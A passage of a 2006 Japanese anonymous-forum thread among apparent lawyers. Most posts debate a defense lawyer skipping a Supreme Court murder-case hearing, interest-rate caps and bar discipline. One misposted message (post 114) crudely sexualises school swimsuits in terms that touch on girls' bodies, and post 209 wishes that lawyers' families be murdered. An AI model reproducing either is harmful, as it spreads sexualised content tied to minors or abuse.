92 :無責任な名無しさん:2006/03/14(火) 19:07:52 ID:K9bjJSMW
>>91
自分の貼ったリンク先読みなよ。

93 :無責任な名無しさん:2006/03/14(火) 19:47:28 ID:uEb+iCPi
この板にスレが立って手、無罪かどうかが話題になってる先生だ。

でも、「今月6日に2人の弁護人が辞任。前後して、(中略)○○弁護士らが就任した。」
とあるから、準備は無理なのは明らかだね。
それで欠席するというのは、非常に勇気があると思うが。

しかし、3月6日になってから辞任する方が懲戒の対象になるんじゃないの。



94 :無責任な名無しさん:2006/03/14(火) 19:57:54 ID:sX79a6rz
>>93
アンタは、3月14日に弁論期日を指定されている事件を、同月6日に依頼されて引き受けるのかい?
辞任は、理由があればするしかないだろう。

昔、左翼過激派の法廷戦術として、辞任→受任→引き延ばし=裁判妨害というのがはやって、
弁護士界が特殊国選弁護というのを作った。=作らされた。

日本国の全体的な法秩序維持のためだよ。このレベルの視野がない人とは議論はムリダポ。

95 :91:2006/03/14(火) 20:01:10 ID:4BxvaAbX
>>92
記事が変わったようだ。
俺がリンクを貼ったときは名前は出ていなかった。

96 :無責任な名無しさん:2006/03/14(火) 20:05:20 ID:idoThmCP
また、これは弁護士、司法書士業界にも少なからず影響を与えるでしょう
クレサラ案件がグッと減るためです
http://blog.goo.ne.jp/kiyotakeyokohari/e/092c61a84c83fb7653ef31ab6e0fe38e

97 :無責任な名無しさん:2006/03/14(火) 20:29:22 ID:tCq7pBW6
そうかい



98 :無責任な名無しさん:2006/03/14(火) 20:58:56 ID:L/aPnBKD
最高裁を延期とはふてぇ弁護士もいるもんだなぁ。こいつ仕事できなくなるんじゃないの

99 :無責任な名無しさん:2006/03/14(火) 21:06:07 ID:f8b7aok7
>>98
非弁乙

100 :MS754 ◆yGUnQdhyV2 :2006/03/14(火) 21:11:13 ID:jti7Q/sb
2ちゃんねるの管理人として著名な西村博之氏が東京弁護士会で、公開講演会
なるものをされるとのことです。

101 :無責任な名無しさん:2006/03/14(火) 22:03:36 ID:vQAisQrv
報道ステーションがくだらん放送しているが
事件の凶悪性と弁論欠席に何の関係があるのか?
重大犯罪の弁論を欠席することが悪いことならば
軽微な犯罪の弁論を欠席してもいいのか?

102 :無責任な名無しさん:2006/03/14(火) 22:47:15 ID:KrHiWWIu
前の弁護人が辞任して6日に選任されたんだよな。
最高裁に期日延期を申し出たにもかかわらず最高裁が無視したから欠席したんでょ

おれでも、欠席するな。最高裁敵に回しても、業務に支障はないし。
地裁の裁判官を敵に回す方が、日常業務に支障はでる可能性がある。


103 :無責任な名無しさん:2006/03/14(火) 23:02:36 ID:KrHiWWIu
質問ですが、「筆界」特定制度
 ひっかい、ひつかい、ぴつかい、ふでかい、

どれなんでしょうか?
競売は「きょうばい」だけど、法律用語的には「けいばい」と読むし。悩むとろです。


104 :無責任な名無しさん:2006/03/14(火) 23:22:30 ID:22dorqIc
好きにしてくれ

105 :無責任な名無しさん:2006/03/14(火) 23:28:07 ID:KuCU61mz
金利も市場経済原理に任せるべき自由市場経済において上限金利を利息制限法の上限金利である15〜20%に統一するなんて頭がどうかしているとしか思えないですね、私には。銀行の貸し出し金利がそれ以上になったらどうするの?ハイパーインフレ時を想起しろ。

106 :無責任な名無しさん:2006/03/14(火) 23:31:03 ID:YdYI7tdA
>>105

業者乙



107 :無責任な名無しさん:2006/03/14(火) 23:33:35 ID:KuCU61mz
>>106
非クレサラ弁護士と呼んでくれ


108 :無責任な名無しさん:2006/03/14(火) 23:35:08 ID:KrHiWWIu
>>105
インフレ時には、時限立法ができるでしょう。

109 :無責任な名無しさん:2006/03/15(水) 00:06:29 ID:+AI9TqTy
>金利も市場経済原理に任せるべき

根拠は?

110 :105:2006/03/15(水) 00:13:26 ID:dIYqJTTx
>>108
インフレ時には確かに時限立法ができるでしょうね。それはともかく今日の日経新聞、経済教室−貸金業新たな制度設計をの論稿では、上限金利は小口向け大口年30%
〜超小口短期45%で統一、大企業向け完全自由化、グレーゾーン撤廃の主張、その成否はともかく、利息制限法に上限金利を統一よりは現実的主張だと思っての投稿でした。

111 :無責任な名無しさん:2006/03/15(水) 00:25:47 ID:+AI9TqTy
>>110
景気が悪くなってる状況を全く考慮せず、

金利は下がったけど、自己破産は増えた→金利を下げても多重債務者問題は解決しない

っていうトンデモ論理にしか読めなかったが。



112 :無責任な名無しさん:2006/03/15(水) 00:26:21 ID:KnFZXsO0
弁護士からみて司法書士ってどんな存在
路傍の石程度?

113 :105:2006/03/15(水) 00:42:00 ID:dIYqJTTx
>>109
自由主義市場経済では大根の値段も金利も市場で決まることは当然。
私に言わせれば、出資法の上限金利も福祉国家的観点、社会政策的配慮による立法だと思います。
利息制限法の上限金利は個人・一般市民のためのセーフティーネット、社会主義的政策。
でもこれには賛成するのでグレーゾーン維持論者ということですね。一本化論者は**主義者かな。
失敬。

114 :無責任な名無しさん:2006/03/15(水) 01:21:26 ID:KllAsBRH
>>501
まんこの部分しか裏地ついてないよ。

だから、男が履くとちんこの半分しか裏地に触れない。
上半分は裏地からはみ出すから、生地の薄いすく水を着ると、結構リアルに浮かび上がる。

まぁ、あくまで実体験に基づいた、俺個人の意見なんで、深くは気にしないでくれ。

胸の部分もデフォ。パットの有無はサイズによる。
身長150cm用以上に入ってるメーカーが多い筈。
裏地は、お腹の冷え防止用に前側全面に入ってる特殊仕様もあるし、
更なる特殊仕様として、背中側も含めて全体に裏地アリのもあるにはある。

まぁ、あくまで収集歴に基づいた、俺個人の意見なんで、深くは気にしないでくれ。

ちなみに、基本的にパットは新スク限定だと思う。
旧スクは生地が厚く、立体裁断で胸が発育した子に対応出来たが、
新スクは生地が薄い為、パットが必要になったと思われる。


115 :無責任な名無しさん:2006/03/15(水) 01:55:27 ID:jmxNwhZl
どこの誤爆だよw

116 :無責任な名無しさん:2006/03/15(水) 08:45:49 ID:3NmbzejB
>91の件、マスコミの弁護士批判はすごいなぁ・・・。
3月6日に弁護人が代わったのなら、既に14日には予定が入っていても
おかしくないよね。
月1回程度開廷している普段の事件なら、直前に代理人等が代わった場合は、
その期日を差し支えにより欠席して期日変更しても何も言われないし。
それなのに最高裁で遺憾であるなどとコメントしていて驚いたよ。
ただ、今回は12月に3月14日の期日が決まっていたのに、3月に入ってから
突然弁護人を変えたところが、期日引き延ばし以外に見えないのだろうね。


117 :無責任な名無しさん:2006/03/15(水) 09:23:01 ID:k2x0hEBa
弁護人の弁論欠席は理解できないなぁ。
弁護人が冤罪だと確信してるような事件ならまだ理解できたが。
理由として日弁連研修により差し支えというのもねぇ。
批判は甘んじて受けるしかないと思うよ。


118 :無責任な名無しさん:2006/03/15(水) 09:33:59 ID:lBWD2lJQ
わざと引き延ばしのために辞任したのかどうか。

わざとじゃなけりゃ,欠席もやむなしだと思われるが。

119 :無責任な名無しさん:2006/03/15(水) 10:04:55 ID:k2x0hEBa
うーん、理由として日弁連研修と書いてることからしてもわざと
としか思えないねぇ。
昨日の遺族の方の発言はことごとくもっともで反論できないと思った。

同業者としては、被告人はおそらく広島の拘置所にいると思うんだが
弁護人は何回接見したのかとかも気になるな。
弁護人は固有権、独立代理権を有するけど、今回の手法、被告人とどこまで
すり合わせていたんだろうか。

120 :無責任な名無しさん:2006/03/15(水) 10:21:49 ID:Vgq5hzoE
上告のときってしょっちゅう会うものなの?
おれは田舎弁だから手続よく知らないけど

>>110
あの日経の記事書いたやつ頭悪いだろ。
結論はわかるが,途中が論旨不明だよ。

そもそも貸し出しの総量規制の話が出てないのがおかしい。
冒頭に,金利の制限だけでは現状を説明できないみたいに書いておきながら,あとはグジャグジャわけわからんこと書いて,
で,結局利息あげろってことでしょ。早稲田の某教授といい卓上の議論が多い。

危ない奴に金貸すな。金借りることを前提に話しすすめるな。って思います。
借金苦で犯罪,破産等,いろいろな問題が発生しているのがわかりませんかね。

金貸し保護するより,やばい奴が金借りれないようにする方が,その後の刑事手続きの費用や全てを失った後の生活保護費用等の税金による社会の負担も少なく,まともな一般人全体に利益があると思います。
あなたの言っている自由主義ってのは,18世紀レベルの自由主義ですから。

保証人から取ろうとしたり,元本回収できなくてもつぶれるまでの間がそれなりにあれば高利だから結局回収できるとかっていう金貸しは,まともに保護すべき金貸しではないと思います。

利限超えて貸したのは全部公序良俗無効にしておけばよい。つまり踏み倒し自由。

121 :無責任な名無しさん:2006/03/15(水) 10:30:54 ID:SlCLYcV9
会務は重要。

122 :無責任な名無しさん:2006/03/15(水) 10:36:39 ID:k2x0hEBa
いやー、しつこいようだけど、欠席の形式的理由によれば
模擬裁判のリハーサルと現に受任している事件の弁論とを天秤かけて
リハーサル優先しますってことだから、これは理解されないでしょ。
まぁ真意はほかにあって、弁護人自身批判を覚悟してると思うけど。
それに日弁連研修って後日見ることできるし。

123 :無責任な名無しさん:2006/03/15(水) 11:03:01 ID:9YftUGcj
>>122
弁護人は研修の出演者ということでは?


124 :122:2006/03/15(水) 11:32:54 ID:k2x0hEBa
>>123
あ、出演者なのね。おれ研修とってないから知らなかったorz
とはいえ、研修本番ではなくそのリハーサルがあるのでっていうのは
やっぱり苦しいねぇ。

125 :無責任な名無しさん:2006/03/15(水) 11:38:02 ID:w/FeyeAx
安田の弁護士資格は没収してほしいな。


126 :無責任な名無しさん:2006/03/15(水) 12:43:29 ID:2BKsTArU
まあ,批判されること必定で欠席できる勇気はすごい。

127 :無責任な名無しさん:2006/03/15(水) 12:56:23 ID:ZVWjM4w0
この人のすごみは、こういうところにあるんだろうな。

被告人を死刑から守るということを目的にするなら、
社会的に非難されても甘んじて受けるという姿勢が見える。

俺にはできんことだが

128 :無責任な名無しさん:2006/03/15(水) 12:57:36 ID:KL/wcx7G
しかし、最高裁で弁論が開かれるって、無期懲役が見直されるということだよね。
欠席したというこたとは死刑になるってこと?

129 :無責任な名無しさん:2006/03/15(水) 13:00:19 ID:ZVWjM4w0
はいはい。

ちゃんとニュースを見てから、書いてね。
最高裁は、弁護人の欠席を批判したけど、
弁護人不在で弁論を開くということまではしなかった。

次回の弁論期日を4月に指定したんだから、現時点では
どうなるかは、未定というしかない(原判決見直しの公算は大きいように
思うが)。

130 :無責任な名無しさん:2006/03/15(水) 13:01:43 ID:qZ2Nqfht
誤解を招く通達を出し、司法書士の定款作成を新会社法施行までに間に合わせたかった法務省。1月18日の照会からたった2日で回答。しかも、司法法制部とも協議済みとのおまけつき。
通達を出した当日に司法書士会と公証人会に手際よく通知。 しかし、MLに匿名で流された情報で知った行政書士個人からの照会には協議をするといって時間稼ぎ。
司法書士は喜び勇んで各地域の司法書士会に通知。京都会の幹部や東京司法書士政治連盟などは、よろこびをホームページで表明した。
ところが、、。悪夢はここからである。
公証人役場からこの情報を聞きつけた行政書士会は、早速法務省に照会。
しぶしぶ、司法書士の定款作成は違法であるが、定款そのものが無効というわけではないので受け付けるという意味であると明かす。
公証人会からも疑問の声があり、法務省は登記研究2月号に、司法書士が定款作成することは違法であると明記すると釈明。
民事局第二課を通じて司法書士会連合会にも、定款作成は違法であると厳重指導を約束。
全国の公証人役場にも、この旨が通知され、いままで通り司法書士の作成した定款は認証しないように要請した。
商業登記の開放が現実的になったため、法務省管轄の司法書士資格の権益確保に奔走し、勇み足をしてしまった格好だ。かくして、司法書士の定款作成は違法であると再確認された。

131 :無責任な名無しさん:2006/03/15(水) 13:05:35 ID:VaFVaaNZ
今のは痛かった…痛かったぞーーー!!!

132 :無責任な名無しさん:2006/03/15(水) 21:49:58 ID:RreSsiLH
弁護人欠席について遺族が懲戒請求したらしいですよ

133 :無責任な名無しさん:2006/03/15(水) 22:49:13 ID:Kd3DQ9Pg
請求だけでニュースになるってのも、なんだかな・・・

134 :無責任な名無しさん:2006/03/15(水) 23:13:08 ID:Ah22Hw/4
>>120
私の場合、東京拘置所なら接見する事もあるけど、その他の場所のときは手紙だけですましてます。
一度も会わないままのときの方が多いと思う。


135 :げ?!:2006/03/15(水) 23:30:13 ID:VQMUIHB9
え!? 
なら、なんで「ちゃんと準備できてないから」って、言わないの?
そりゃ通用しないの?
勉強会が忙しいから、は通用するのに?

136 :無責任な名無しさん:2006/03/16(木) 00:17:35 ID:E9b7Pb9/
>>135
非弁乙。
準備できてないからと言って、期日延期の申請はしてるよ。最高裁が無視しただけ。

137 :無責任な名無しさん:2006/03/16(木) 00:19:11 ID:Vyyaozkx
大弁の後藤先生,無罪取りましたね〜。流石ですね〜。

当職も一回は無罪を取ってみたひ・・・。(T-T) ウルウル

138 :無責任な名無しさん:2006/03/16(木) 00:41:23 ID:JzX50QSx
>>136
それよりも直筆と思われる理由書がTVに映っていたことに疑問。
裏でどんなゴタゴタがあったか非常に気になる。

139 :無責任な名無しさん:2006/03/16(木) 00:53:22 ID:E9b7Pb9/
>>138
期日直前に辞任してるんだから、これって国選じゃないよね。
実は、前の弁護人は、知恵をつけた被告人に解任されてたりして。


140 :無責任な名無しさん:2006/03/16(木) 01:02:12 ID:JzX50QSx
>>138
私選だよ。>>91を読む限りは仕方がないかという気もするが…

141 :無責任な名無しさん:2006/03/16(木) 01:02:48 ID:JzX50QSx
>>138×
>>139

…orz

142 :無責任な名無しさん:2006/03/16(木) 01:16:29 ID:E9b7Pb9/
私選と言っても、ボランティアなんだろう。
オウムの時と言い頭が下がります。

個人的には死刑制度賛成派なのだが、期日延期申請を却下した最高裁も最高裁だよな。
地裁・高裁なら、とりあえず1ヶ月は延期しただろうに(引き延ばしだと分かってても)


143 :無責任な名無しさん:2006/03/16(木) 01:29:51 ID:6mesRHi6
期日に出頭できないなら、受任しなければいいのに。

受任しておいて出頭しないっつうのはなぁ。


144 :無責任な名無しさん:2006/03/16(木) 01:33:12 ID:WpJT06Qd
>>143

 その場合は辞任がベストです。
 これなら懲戒にはかからない。

145 :無責任な名無しさん:2006/03/16(木) 11:12:26 ID:KxzjU6Bs
今月号の自由と正義ですが、京都の件、あれ懲戒って酷くないですか?
依頼者がリストカットをしていることなどから、依頼者の扱いに慎重を要
する案件故、深入りしたと推測するのですが、それが相手方の懲戒請求
で懲戒とはどうかと。

あと、これらの事情を何故、懲戒請求者(相手方)が把握しているのかと
いう点にも疑問が残りますし。

146 :無責任な名無しさん:2006/03/16(木) 11:30:33 ID:pYPDGqYQ
>142
同意。
期日延期申請を完全無視する最高裁もどうなんだと思う。
最高裁は、弁論開くまで好きなだけ時間かけて何年もじっくり検討するくせに、
新しく付いた弁護人には記録検討の時間すらくれないんだもんな・・。

今回の件で、もし弁護士会が懲戒却下したら、ますますマスコミは弁護士会を
批判するんだろうな。そして、自浄能力のない弁護士会とか、監督官庁のない
弁護士会の問題とか何とか批判されているうちに、法務省のお役人が弁護士会を
管理していく体制になりそうな悪寒。
法テラスがその第一歩のような気がするよ。

147 :無責任な名無しさん:2006/03/16(木) 11:38:18 ID:VmoXZm9L
>>145
まだ来てない

148 :無責任な名無しさん:2006/03/16(木) 12:34:08 ID:4SPbWW9v
弁護士会は自治と称して好き勝手やってきたからな。
自称能力などない。

149 :無責任な名無しさん:2006/03/16(木) 12:58:58 ID:QYN0zu3T
男女の関係を疑わせる・・・か

150 :無責任な名無しさん:2006/03/16(木) 13:02:59 ID:jE1V2gH9
>>148
非弁乙。

151 :無責任な名無しさん:2006/03/16(木) 13:07:19 ID:3IV0AbQ6
今月号の自由と正義、弁護士としての個人的な感覚からすると
厳しいなと感じる事案が多いような気がするんだが、むしろ
漏れの感覚の方がおかしいのかな?


152 :無責任な名無しさん:2006/03/16(木) 13:20:41 ID:VmoXZm9L
>>148
自称能力とは何だ。

153 :無責任な名無しさん:2006/03/16(木) 13:23:09 ID:FJJZBPpz
自分を馬鹿だと名乗る能力のこと。


154 :無責任な名無しさん:2006/03/16(木) 14:13:25 ID:8ly5otCH
弁護士になれたとして、DQN相手にやっていけるかどうか不安。
泥臭いこと得意じゃないし。慣れなんだろうが。
大人しく公務員でも目指しておくべきか・・・。

155 :無責任な名無しさん:2006/03/16(木) 14:23:13 ID:JzX50QSx
>>154
キミの性格だとそれが正解

156 :無責任な名無しさん:2006/03/16(木) 14:50:58 ID:6mesRHi6
凶徒の権はきびしす

157 :無責任な名無しさん:2006/03/16(木) 14:55:55 ID:8ly5otCH
人からはよく「おぼっちゃま育ち??」と言われます。
実際そうですが。

158 :無責任な名無しさん:2006/03/16(木) 15:01:45 ID:bXNM53kI
>>154
公務員ほどDQNを相手にしなきゃならない仕事はないと思うぞ。
全くの内勤なら別として。

159 :無責任な名無しさん:2006/03/16(木) 15:05:37 ID:Bq/dsOfp
DQNを相手にしないで済む公務員なら、国家I種じゃないと無理だな。
しかも、出身大学次第では、国家I種でもDQN相手をしないといけなくなるかもだし。

160 :無責任な名無しさん:2006/03/16(木) 15:08:38 ID:9ukaFQpy
弁護士は育ちの悪い方が向いてます
実際BKが多いですし

161 :無責任な名無しさん:2006/03/16(木) 15:18:03 ID:VmoXZm9L
>>160
じゃあ君向いてるねw

162 :無責任な名無しさん:2006/03/16(木) 15:30:01 ID:HtjixNdH
>154
 相手がDQNであっても、どうってことないです。むしろ、そんな相手だから依頼が来たと感謝すべきです。
 これに対し、依頼者がDQNである事件は本当に大変です。イソ弁の間は、ボス弁が自分だけだったらやらないのに、イソ弁がやるからと仕事を引き受けたりします。
まぁ、そうやって鍛えられるのですが。

163 :無責任な名無しさん:2006/03/16(木) 15:39:18 ID:vnkpe2w6
変に決断力と行動力のあるDQNの依頼者が一番怖い

164 :無責任な名無しさん:2006/03/16(木) 16:16:52 ID:/vRT75Dz
公務員の中でも、裁判官はDQNに当たる率が低い職種なんじゃないかと
思う。書記官が守ってくれるしね。
裁判ではDQN当事者と会うことはあるだろうけど、裁判官として裁判中に
会う当事者なんて可愛いもんだよ。

165 :無責任な名無しさん:2006/03/16(木) 18:09:29 ID:Kfb9cqQd
だいたい、裁判官って、自分で電話とらないし、ダイヤルしない。


166 :無責任な名無しさん:2006/03/16(木) 19:54:39 ID:dq6N9i0q
3年たったら転勤で逃げられる。

167 :無責任な名無しさん:2006/03/16(木) 21:14:53 ID:8ly5otCH
いや、国Tなんて無理ですよ。
試験に受かる自信はあります。でも、やっていける自信が無い。
適当なお役所仕事で良いんですよ。
国会図書館なんて良いですね。

同級生は僕のことをおちこぼれとか変人とかいった目でみるでしょうが、
そんなのんびりした人生もありかな、と。
読書でもしてのんびり暮らしたいです。

スレ汚し、すみませんでした。

168 :無責任な名無しさん:2006/03/16(木) 22:13:10 ID:VmoXZm9L
http://web.archive.org/web/20050321034049/www.starblvd.com/mem/a/o/aoiryuyu/yamaguchishikan.htm

169 :無責任な名無しさん:2006/03/16(木) 22:59:37 ID:/wcNmfas
>>168
あらあら

170 :無責任な名無しさん:2006/03/17(金) 01:13:20 ID:SAaYQL35
ところで、京都の人は独身なんだろうか?
あそこまで依頼者の面倒をみるなんて、俺にはとうていできないな・・・

171 :無責任な名無しさん:2006/03/17(金) 03:17:27 ID:zuCvJoWY
弁理士って法律関係ですか?

172 :無責任な名無しさん:2006/03/17(金) 08:17:07 ID:2qAgqoYh
523 :483:2006/03/16(木) 23:17:24 ID:???
宮川「倫理的思考を常にするという習慣を有している実務家は少ない。
 現在の指導担当者(=弁護士)が彼ら(=ロー卒修習生)に、倫理問題について、
 彼らと議論し適切に考えを示すことができるか。脇が甘いと感じられることがないか、心配です。」

173 :TN:2006/03/17(金) 09:52:54 ID:hC/torvT
>>167
君に向いてる仕事は大学教授だと思う
ゼミの指導教官にでも相談してみれば

174 :無責任な名無しさん:2006/03/17(金) 11:04:22 ID:EbLTnpbZ
>>165
刑事裁判官は検察官にはよく直電してるみたいだけどな

175 :無責任な名無しさん:2006/03/17(金) 11:28:53 ID:SzGyIp52
満員電車にも負けず
高い家賃にも負けず
殺伐とした人間関係にも負けぬ
無神経な心を持ち
欲張りで
体制には逆らわず
いつも不満ばかりを言っている
あらゆることを
自分を中心に考え
自分のことは棚に上げ
他人の失敗は激しく罵り
思い切り見栄を張り
無理をしてマンションに住み車を持ち
東に雑誌が紹介した店あれば
味も分からず飛んでいき
西で行列していれば
訳も分からず一緒に並び
南で死にそうな人がいても
見て見ぬふりをし
北に喧嘩や訴訟があれば
野次馬になりはやしたて
ちょっと働いて思い切り遊び
カードで買い物をし払えなくなり
みんなにオシャレと言われ
近所づきあいはせず
義理と人情を踏みにじり
マスコミに踊らされてる
そういう東京人に
私はなりたい


176 :無責任な名無しさん:2006/03/17(金) 13:34:50 ID:uwe3hYTP
京都事案で懲戒はちょっとひどいんじゃないか?


177 :無責任な名無しさん:2006/03/17(金) 13:54:21 ID:f+cahTn5
本当に気の毒だ。しかもこんな事案で実名が出てしまうとは。
しかも、懲戒申立は相手方(夫)だしねぇ・・。
結構事細かに書かれているところを見ると、夫は探偵でもつけたのかな。

依頼者本人が、飲みに誘われたとか家に勝手に来られて不快だと言って
懲戒なら仕方ないかと思うけど、依頼者が弁護士の対応に満足していても、
この程度で懲戒になるんだね。
このケースだと、もし依頼者の呼び出しに応じなかったりしたら、それはそれで
依頼者から懲戒申し立てられてそうだ。行かなくても懲戒にはならないだろうけど。
こういうのには、最初から関わらないのが一番なのか。

178 :無責任な名無しさん:2006/03/17(金) 14:13:53 ID:pa/bJppa
 懲戒申立者は、不貞行為に及んだと申し立てたのでしょうね。
 そして、宿泊している点において、グレーと見たのでしょうね。不服申し立てすればひっくり返るかな?

179 :無責任な名無しさん:2006/03/17(金) 16:11:24 ID:aIaONDg8
懲戒は第三者機関がやるべきでしょ。

180 :無責任な名無しさん:2006/03/17(金) 17:32:09 ID:uwe3hYTP
>>179
非弁乙。

181 :無責任な名無しさん:2006/03/17(金) 18:03:57 ID:KkFuWwTg
二部生から弁護士になった俺は神同然

182 :無責任な名無しさん:2006/03/17(金) 18:10:16 ID:VmaRhJTB
まあ何から弁護士になったのかより、
弁護士になってから何をしたのかの方が重要なんだが。

どの世界にも言えることか。

183 :無責任な名無しさん:2006/03/17(金) 20:14:18 ID:Tl6bQiyu
すみません。
質問します。

労働事件を依頼する場合(労働者側)で、従業員たる地位(労働契約存在)確認と地位保全のための仮処分申請を依頼する場合と本訴を依頼する場合、どちらのほうがお金になるのですか?

184 :無責任な名無しさん:2006/03/17(金) 20:31:12 ID:uwe3hYTP
スレ違い。

http://school5.2ch.net/test/read.cgi/shikaku/1142083945/l50
労働法のスレ(職場、賃金等のトラブル)Part42
へどうぞ。

185 :無責任な名無しさん:2006/03/17(金) 22:28:29 ID:QCiuaBIY

弁論欠席の弁護士に初の「出頭在廷命令」…最高裁
http://www.yomiuri.co.jp/national/news/20060317it15.htm

やはり,臨時総会では第1号,第2号議案は否決しておいたほうがよかったな。
弁護士会が裁判所・法務省の管轄下に入る日は近い。


186 :無責任な名無しさん:2006/03/18(土) 00:23:14 ID:GyZPC26h
やっぱりこういう流れになるのか・・・
ただ、欠席自体に問題があるのも否定しがたい
リハーサル欠席をよしとしてもはじめから出頭不可がわかってて
最高裁の事件を直近に2人で受任してるってことなんだし

悪しき前例を作ったという意味でも
日弁に対する世論の目がさらに厳しくなり、
他の主張に(国選報酬その他)悪影響を与えるという意味でも
もうちょっと考えてほしかった
空気なんぞ読む必要ないって思っての行動なんだろうけどね

187 :無責任な名無しさん:2006/03/18(土) 01:24:53 ID:IgzQotNb
死刑が見え見えなんだから、裁判長が体感するまで引き延ばして流れを変えようとする
弁護方針はわからないでもない。
そもそも最高裁は4年近くも審理したんだから、3ヶ月くらい弁論延期するの認めればいいのに・・・
なぜ、弁論欠席した弁護士が批判されて、4年も放置してた最高裁が批判されないのかが不思議。


188 :無責任な名無しさん:2006/03/18(土) 10:42:57 ID:GaZpDI2d
昨日、新宿ロフトワンでトークライブがあったみたいだが、混乱なかっただろうか。
http://www.loft-prj.co.jp/naked/schedule/naked.cgi

うちの嫁に話したら、そんなのに出る暇があれば裁判に出ればいいのに、という
返事だった。一般人の認識はこんなものなんだろうな。

189 :無責任な名無しさん:2006/03/18(土) 10:59:34 ID:kp8ZYwlr
日弁連なんて政治的な偏向がはなはだしい。
強制加入制度をとっとと廃止してもらいたいものだ。

190 :無責任な名無しさん:2006/03/18(土) 11:20:29 ID:6d/zwSaG
そもそも、安田氏がほんとに弁論に来てたら、最高裁はどうする気だったんだろ。
事件記録にも目を通せていない弁護人に来られても、審理にならないので、むしろ
来られても困ると思うし。
もし来ちゃってたら、裏口からこっそり帰してたんじゃないか。

191 :無責任な名無しさん:2006/03/18(土) 11:54:20 ID:+ji0abvF
死刑が妥当か否か議論は分かるところであり、弁論を開ければ確実に死刑になることが分かっているわけだから、
裁判官交代による判決変更の可能性にかけて欠席することは弁護人として当然の戦術だ。
裁判は闘い、ゲームなんだからね。
安田先生は次回弁論直前に辞任して。次回も弁論を開かせるべきではない。

192 :無責任な名無しさん:2006/03/18(土) 12:13:46 ID:jtcrm4g4
強制加入廃止ってことは、法務省の監督に服するってことだ

193 :無責任な名無しさん:2006/03/18(土) 13:41:32 ID:8IK/HKiL
 裁判官にもDQNがいるよな。
再任拒否コースだろうけど。

194 :無責任な名無しさん:2006/03/18(土) 13:50:36 ID:VwJj3ljy
>裁判は闘い、ゲームなんだからね。

被害者の親族の痛みも理解できないで”闘い、ゲーム”ごっこかよ。


195 :無責任な名無しさん:2006/03/18(土) 14:55:17 ID:QMPePHNU
>>190
碌に弁論しなくても、弁護人がいるということが重要。
あっさり結審していたと思われ。

196 :無責任な名無しさん:2006/03/18(土) 14:56:56 ID:LAeeV8CI
>>195
ワシもそう思う。
だから、どうせいろいろ言われることになることは必至だったけど、
欠席は弁護戦術としてはありえた。

197 :無責任な名無しさん:2006/03/18(土) 15:44:53 ID:S1XDIb+0

出 席 す る
 ↓
準備期間なく不十分な弁論
 ↓
少年から懲戒請求+弁護過誤損害賠償請求
 ↓
少なくとも懲戒相当になりそう


欠 席 す る
 ↓
最高裁から在廷命令+遺族から懲戒請求
 ↓
次回期日に出頭すれば懲戒にはなりそうにない


辞任するという選択肢を除けば,欠席して正解。

198 :無責任な名無しさん:2006/03/18(土) 15:47:41 ID:S1XDIb+0
最高裁は裁判の迅速化しか見てない。裁判所の都合以外で延ばされるのを最近極端に嫌う。
最近のサラ金不利の判決多発も,立法的解決と訴訟前の解決を促して,過払金返還訴訟の数を減らそうという意図から出てるんでしょう。

199 :無責任な名無しさん:2006/03/18(土) 16:11:19 ID:QMPePHNU
そりゃ、あれだけ「裁判が遅い、もっと早くしろ」と言われたら
こうなるわな……。判決の質も最近下がっていないか?

200 :無責任な名無しさん:2006/03/18(土) 16:56:54 ID:QKsAl7zm
でも、裁判所は当事者が裁判遅らすのには怒るけど、自分の都合で遅れる
ことには何も悪いと思ってないのが腹立たしいんだよな。
最近の裁判官は、争点整理案なるものを出して来たりするけど、それが
完成しなくて何ヶ月か期日が空転したり、裁判所の都合で気軽に判決延期したり。
急いでいる事件でも、裁判官が夏期休廷中には全然期日を入れないくせに、
弁護士には休み中でも出てこいと言う。
裁判官が転勤で変更した後は、「まだ記録検討未了なので」とか気軽に言うくせに
代理人が代わって記録がよく検討できていなくても、「次の期日を知ってて受任した
のでしょう?!」などと怒ったり。
・・・裁判官様は偉いなあ。


201 :無責任な名無しさん:2006/03/18(土) 17:37:43 ID:DsPj7D6P
安田氏の本見ると過去にも訴訟指揮に抗議して欠席したり
しているから、弁護人の延期申請を却下すれば欠席すると
裁判所は予想していたかもしれない。結局、安田氏に対す
る世論の悪感情を醸成する裁判所の意図にまんまと乗って
しまった気がしないでもない。

202 :無責任な名無しさん:2006/03/18(土) 18:07:07 ID:ef8l6Q6g
今回の件は,弁と非弁とで評価が大きく分かれる事案だな。

出頭すれば弁論終結となるのが見えている状況で,
出頭すべきと考える弁は少ないのではないか。

203 :無責任な名無しさん:2006/03/18(土) 18:22:14 ID:J/ita21n
安田さんは、自分の意思で期日が迫っている事件を受任したんでしょ。
弁論準備をするつもりで受けたんなら????だし、準備が出来ないことが分かっていて受けたんなら、自分の都合で最高裁が期日を延期してくれる、ないしは、するべきだと考えていたんだろうな。

いずれにしても、オイラのようなフツ弁には真似もできんし、理解不能。
ヤクザの収監逃れのために控訴、上告する弁護士を軽蔑するのは、もはや時代遅れの感覚なんかね。


204 :無責任な名無しさん:2006/03/18(土) 18:54:44 ID:dsgkzAji
普通の弁護士にとっては,こんな案件を受任することが理解不能
というのはそうだろな。
俺も絶対に受けない。

ただ,本件は
>ヤクザの収監逃れのために控訴、上告する弁護士
というのとはチト違うだろ。

205 :無責任な名無しさん:2006/03/18(土) 19:02:01 ID:6d/zwSaG
火中の栗を拾う人間が居なければ、
3/6辞任->弁護人が居ないため3/14の弁論はお流れ->国選弁護人をつける->再度弁論期日設定。
で、GW後にしか期日は入らんかったでしょうな。

206 :無責任な名無しさん:2006/03/18(土) 19:04:33 ID:6l6cUkb6
>>194
非弁乙。

207 :無責任な名無しさん:2006/03/18(土) 19:17:39 ID:saOsEycz
そうだなヤクザの収監逃れの控訴、上告とは明らかに違うね。
1、2審は、無期懲役だった。これまでの相場からすると1、2審理の結論が妥当な量刑。
このまでは死刑だが、弁論が延期され、裁判官が交代すれば、無期懲役になる可能性はかなりある。
結論が変らない単なる時間稼ぎとは全然違うよ。
欠席や辞任が弁護人として唯一効果的な弁護戦術だろう。

208 :無責任な名無しさん:2006/03/18(土) 19:20:01 ID:oIe4pbut
単に弁論の準備期間がなかったから欠席しただけでしょう
弁論が開かれても無期懲役の結論はかわらんでしょう


209 :無責任な名無しさん:2006/03/18(土) 20:32:01 ID:S4Y+BLTP
やはり弁護士なんてのはクズで、金のためなら何でもする。

人の命や、感情なんてどうでもいい。
自分たちの習慣や価値観の方が大事→これが飯の種。その為なら何でもする。

お前ら、いっぺん家族を惨殺されろ!

210 :無責任な名無しさん:2006/03/18(土) 20:33:47 ID:eTr/NhmM
俺もギリギリ無期の事案だと思うがな。
無断欠席はもちろん悪いが,ムキになるほどの事情でもないだろ。

